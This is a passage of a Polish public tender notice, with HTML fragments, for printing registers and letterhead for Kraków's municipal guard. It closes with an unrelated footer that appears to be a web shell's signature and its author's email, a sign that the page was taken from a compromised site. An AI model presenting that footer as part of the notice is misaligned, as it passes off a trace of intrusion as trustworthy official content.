Rejestry  będą wykonane w formacie A5, układ pionowy, na papierze białym, 80g/m2,  każda kartka zadrukowana dwustronnie w kolorze czarnym. Ilość stron razem z okładkami - 24, strony numerowane. Kartki w rejestrze zszyte w sposób trwały w formę zeszytu.
Rejestr nr 2 - książka odpraw do służby - 100 szt. (wzór nr 13)
Rejestry  będą wykonane w formacie A4 na papierze białym, 80g/m2,  każda kartka zadrukowana dwustronnie w kolorze czarnym. Treść strony tytułowej i wnętrza rejestru - zgodna ze wzorem.  Ilość stron, bez strony tytułowej - 200, strony numerowane. Rejestry muszą być oprawione w okładkę kartonową, min. 200g/m2, na okładce musi być umieszczona nazwa rejestru. Kartki rejestru wraz z okładką muszą być zszyte w sposób trwały. Grzbiet powinien być przykryty okładką.
Rejestr nr 3 - książka służby- 100 szt. (wzór nr 14)
Rejestry  będą wykonane w formacie A4 na papierze białym, 80g/m2,  każda kartka zadrukowana dwustronnie w kolorze czarnym. Treść strony tytułowej i wnętrza rejestru - zgodna ze wzorem.  Ilość stron, bez strony tytułowej - 200, strony numerowane. Rejestry muszą być oprawione w okładkę kartonową, min. 200g/m2, na okładce musi być umieszczona nazwa rejestru. Kartki rejestru wraz z okładką muszą być zszyte w sposób trwały. Grzbiet powinien być przykryty okładką.
Rejestr nr 4 - książka wydawania i przyjęcia rmg i paralizatorów - 10 szt. (wzór nr 15)
Rejestry  będą wykonane w formacie A4 na papierze białym, 80g/m2,  każda kartka zadrukowana dwustronnie w kolorze czarnym. Treść strony tytułowej i wnętrza rejestru - zgodna ze wzorem.  Ilość stron, bez strony tytułowej - 200, strony numerowane. Rejestry muszą być oprawione w okładkę kartonową, min. 200g/m2, na okładce musi być umieszczona nazwa rejestru. Kartki rejestru wraz z okładką muszą być zszyte w sposób trwały. Grzbiet powinien być przykryty okładką.
Rejestr nr 5 - raport dyspozytora - 50  szt. (wzór nr 16)
Rejestry  będą wykonane w formacie A4 na papierze białym, 80g/m2,  każda kartka zadrukowana dwustronnie w kolorze czarnym. Treść strony tytułowej i wnętrza rejestru - zgodna ze wzorem.  Ilość stron, bez strony tytułowej - 200, strony numerowane. Rejestry muszą być oprawione w okładkę kartonową, min. 200g/m2, na okładce musi być umieszczona nazwa rejestru. Kartki rejestru wraz z okładką muszą być zszyte w sposób trwały. Grzbiet powinien być przykryty okładką.
Rejestr nr 6 - rejestr odholowanych pojazdów - 20  szt. (wzór nr 17)
Rejestry  będą wykonane w formacie A4 na papierze białym, 80g/m2,  każda kartka zadrukowana dwustronnie w kolorze czarnym. Treść strony tytułowej i wnętrza rejestru - zgodna ze wzorem.  Ilość stron, bez strony tytułowej - 200, strony numerowane. Rejestry muszą być oprawione w okładkę kartonową, min. 200g/m2, na okładce musi być umieszczona nazwa rejestru. Kartki rejestru wraz z okładką muszą być zszyte w sposób trwały. Grzbiet powinien być przykryty okładką.
Rejestr nr 7 - rejestr wydawania i zwrotu radiotelefonów - 20  szt. (wzór nr 18)
Rejestry  będą wykonane w formacie A4 na papierze białym, 80g/m2,  każda kartka zadrukowana dwustronnie w kolorze czarnym. Treść strony tytułowej i wnętrza rejestru - zgodna ze wzorem.  Ilość stron, bez strony tytułowej - 200, strony numerowane. Rejestry muszą być oprawione w okładkę kartonową, min. 200g/m2, na okładce musi być umieszczona nazwa rejestru. Kartki rejestru wraz z okładką muszą być zszyte w sposób trwały. Grzbiet powinien być przykryty okładką.
Rejestr nr 8 - rejestr interwencji z monitoringu - 50  szt. (wzór nr 19)
Rejestry  będą wykonane w formacie A4 na papierze białym, 80g/m2,  każda kartka zadrukowana dwustronnie w kolorze czarnym. Treść strony tytułowej i wnętrza rejestru - zgodna ze wzorem.  Ilość stron, bez strony tytułowej - 200, strony numerowane. Rejestry muszą być oprawione w okładkę kartonową, min. 200g/m2, na okładce musi być umieszczona nazwa rejestru. Kartki rejestru wraz z okładką muszą być zszyte w sposób trwały. Grzbiet powinien być przykryty okładką.
Rejestr nr 9 - zestawienie odcinków D mandatów karnych - 20  szt. (wzór nr 20A)
Rejestry  będą wykonane w formacie A4 na papierze białym, 80g/m2,  każda kartka zadrukowana dwustronnie w kolorze czarnym. Treść strony tytułowej i wnętrza rejestru - zgodna ze wzorem.  Ilość stron, bez strony tytułowej - 100, strony numerowane. Rejestry muszą być oprawione w okładkę kartonową, min. 200g/m2, na okładce musi być umieszczona nazwa rejestru. Kartki rejestru wraz z okładką muszą być zszyte w sposób trwały. Grzbiet powinien być przykryty okładką..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.81.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Druki firmowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 3  - druki firmowe
                Oznaczenie przedmiotu zamówienia wg CPV 798100 00-5

p-1 Komendant Straży Miejskiej Miasta Krakowa - 3 000 szt.  (wzór nr 20)
p-2 Straż Miejska Miasta Krakowa  - 4 000 szt. (wzór nr 21)
p-3 SMMK - Oddział I Śródmieście - 2 000 szt. (wzór nr 22)
p-4 SMMK - Oddział II Krowodrza - 1 000 szt. (wzór nr 23)
p-5 SMMK - Oddział III Nowa Huta - 1 000 szt. (wzór nr 24)
p-6 SMMK - Oddział IV Podgórze  - 1 000 szt. (wzór nr 25)
p-7 SMMK - Oddział V Wola Duchacka - 1 000 szt. (wzór nr 26)
p-8 SMMK - Oddział VI Wzgórza Krzesławickie - 1 000 szt. (wzór nr 27)
p-9 SMMK - Referat ds. Wykroczeń - 7 000 szt. (wzór nr 28)

Każdy rodzaj druku wykonany musi być na papierze białym min. 160 CIE (+/-3), gramatura 90 g/m2, gatunek I.    W nagłówku: pasek kolorze ciemnogranatowym z białymi napisami,  emblemat w kolorze ciemnogranatowym obwiedziony żółtą obwódką, napisy w kolorze żółtym, herb Krakowa zgodnie z kolorystyką. W stopce: wszystkie napisy w kolorze ciemnogranatowym, logo certyfikatu jakości zgodnie z kolorystyką. Przy dostawie każdy rodzaj druku musi być spakowany oddzielnie, w partiach po 500 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.81.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com